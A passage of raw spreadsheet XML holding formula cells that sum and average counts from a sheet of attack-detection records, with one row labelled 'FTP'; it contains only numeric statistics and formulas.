        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>611</v>
      </c>
      <c r="BN36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>745</v>
      </c>
      <c r="BO36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
      <c r="BT36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>0</v>
      </c>
      <c r="CG36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>2</v>
      </c>
      <c r="CL36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>3</v>
      </c>
      <c r="CN36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>0</v>
      </c>
      <c r="CP36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>18</v>
      </c>
      <c r="CQ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>15</v>
      </c>
      <c r="CT36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI36" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ36" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BB3:$BB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>0</v>
      </c>
      <c r="DK36" s="271"/>
      <c r="DO36" s="357"/>
      <c r="DP36" s="358" t="s">
        <v>209</v>
      </c>
      <c r="DQ36" s="359">
        <v>0.0</v>
      </c>
      <c r="DR36" s="359">
        <v>3.0</v>
      </c>
      <c r="DS36" s="359">
        <v>7.0</v>
      </c>
      <c r="DT36" s="359">
        <v>7.0</v>
      </c>
      <c r="DU36" s="360">
        <v>8.0</v>
      </c>
      <c r="DV36" s="271"/>
      <c r="DW36" s="358" t="s">
        <v>209</v>
      </c>
      <c r="DX36" s="359">
        <v>0.0</v>
      </c>
      <c r="DY36" s="359">
        <v>3.0</v>
      </c>
      <c r="DZ36" s="359">
        <v>7.0</v>
      </c>
      <c r="EA36" s="359">
        <v>7.0</v>
      </c>
      <c r="EB36" s="360">
        <v>9.0</v>
      </c>
      <c r="EC36" s="271"/>
      <c r="ED36" s="280"/>
      <c r="EG36" s="279"/>
      <c r="EH36" s="271"/>
      <c r="EI36" s="358" t="s">
        <v>209</v>
      </c>
      <c r="EJ36" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S34 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EK36" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI36 &amp; "*")</f>
        <v>22</v>
      </c>
      <c r="EL36" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI36 &amp; "*")</f>
        <v>35</v>
      </c>
      <c r="EM36" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI36 &amp; "*")</f>
        <v>84</v>
      </c>
      <c r="EN36" s="360">
        <f t="shared" si="4"/>
        <v>84</v>
      </c>
      <c r="EO36" s="364"/>
      <c r="EP36" s="364"/>
      <c r="EQ36" s="364"/>
      <c r="ER36" s="271"/>
      <c r="ES36" s="271"/>
      <c r="ET36" s="271"/>
      <c r="EU36" s="271"/>
      <c r="EV36" s="379" t="s">
        <v>209</v>
      </c>
      <c r="EW36" s="389">
        <f t="shared" si="8"/>
        <v>0.5555555556</v>
      </c>
      <c r="EX36" s="389">
        <f t="shared" si="9"/>
        <v>2.444444444</v>
      </c>
      <c r="EY36" s="389">
        <f t="shared" si="10"/>
        <v>3.888888889</v>
      </c>
      <c r="EZ36" s="390">
        <f t="shared" si="11"/>
        <v>9.333333333</v>
      </c>
      <c r="FA36" s="367"/>
      <c r="FC36" s="382" t="s">
        <v>2465</v>
      </c>
      <c r="FD36" s="383"/>
      <c r="FE36" s="384">
        <f t="shared" ref="FE36:FH36" si="20">SQRT(FE34*(1-FE35))</f>
        <v>0.08526733057</v>
      </c>
      <c r="FF36" s="384">
        <f t="shared" si="20"/>
        <v>0.1826963723</v>
      </c>
      <c r="FG36" s="384">
        <f t="shared" si="20"/>
        <v>0.1887987094</v>
      </c>
      <c r="FH36" s="385">
        <f t="shared" si="20"/>
        <v>0.1413416415</v>
      </c>
      <c r="FK36" s="303" t="s">
        <v>357</v>
      </c>
      <c r="FL36" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK36 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="FM36" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK36 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="FN36" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK36 &amp; "*")</f>
        <v>26</v>
      </c>
      <c r="FO36" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK36,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK36 &amp; "*")</f>
        <v>40</v>
      </c>
      <c r="FP36" s="392"/>
      <c r="FQ36" s="303" t="s">
        <v>357</v>
      </c>
      <c r="FR36" s="69">
        <f t="shared" ref="FR36:FU36" si="21">1-(FL36/EJ38)</f>
        <v>0</v>
      </c>
      <c r="FS36" s="69">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="FT36" s="69">
        <f t="shared" si="21"/>
        <v>0.03703703704</v>
      </c>
      <c r="FU36" s="306">
        <f t="shared" si="21"/>
        <v>0.2857142857</v>
      </c>
      <c r="FV36" s="392"/>
      <c r="FW36" s="392"/>
      <c r="FX36" s="392"/>
      <c r="FY36" s="392"/>
      <c r="FZ36" s="392"/>
      <c r="GA36" s="392"/>
      <c r="GB36" s="392"/>
      <c r="GC36" s="392"/>
      <c r="GD36" s="392"/>
      <c r="GE36" s="392"/>
      <c r="GF36" s="392"/>
      <c r="GG36" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"FTP")</f>
        <v>FTP</v>
      </c>
      <c r="GH36" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GI36" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GJ36" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0.6666666667</v>
      </c>
      <c r="GK36" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"FTP")</f>
        <v>FTP</v>
      </c>
      <c r="GL36" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0.3333333333</v>
      </c>
      <c r="GM36" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0.3333333333</v>
      </c>
      <c r="GN36" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0.3333333333</v>
      </c>
      <c r="GO36" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"FTP")</f>
        <v>FTP</v>
      </c>
      <c r="GP36" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0</v>
      </c>
      <c r="GQ36" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0</v>
      </c>
      <c r="GR36" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0</v>
      </c>
      <c r="GS36" s="395" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"FTP")</f>
        <v>FTP</v>
      </c>
      <c r="GT36" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0</v>
      </c>
      <c r="GU36" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0</v>
      </c>
      <c r="GV36" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG36)</f>
        <v>0</v>
      </c>
      <c r="GW36" s="392"/>
      <c r="GX36" s="392"/>
      <c r="GY36" s="392"/>
      <c r="GZ36" s="392"/>
      <c r="HA36" s="392"/>
      <c r="HB36" s="392"/>
      <c r="HC36" s="392"/>
      <c r="HD36" s="392"/>
      <c r="HE36" s="392"/>
      <c r="HF36" s="392"/>
      <c r="HG36" s="392"/>
      <c r="HH36" s="392"/>
      <c r="HI36" s="392"/>
      <c r="HJ36" s="392"/>
      <c r="HK36" s="392"/>
      <c r="HL36" s="392"/>
      <c r="HM36" s="392"/>
      <c r="HN36" s="392"/>
      <c r="HO36" s="392"/>
      <c r="HP36" s="392"/>
    </row>
    <row r="37">
      <c r="B37" s="277"/>
      <c r="C37" s="271"/>
      <c r="D37" s="271"/>
      <c r="E37" s="271"/>
      <c r="F37" s="271"/>
      <c r="G37" s="278"/>
      <c r="J37" s="277"/>
      <c r="K37" s="349">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BB3:BB139)</f>
        <v>1435</v>
      </c>
      <c r="L37" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CN3:CN139)</f>
        <v>35456</v>
      </c>
      <c r="M37" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!ED3:ED139)</f>
        <v>40513</v>
      </c>
      <c r="N37" s="351">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FT3:FT139)</f>
        <v>169750</v>
      </c>
      <c r="O37" s="278"/>
      <c r="Q37" s="271"/>
      <c r="R37" s="386" t="s">
        <v>2480</v>
      </c>
      <c r="S37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1301</v>
      </c>
      <c r="T37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>1253</v>
      </c>
      <c r="U37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>113</v>
      </c>
      <c r="V37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>13</v>
      </c>
      <c r="W37" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CN3:$CN139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X37" s="353">
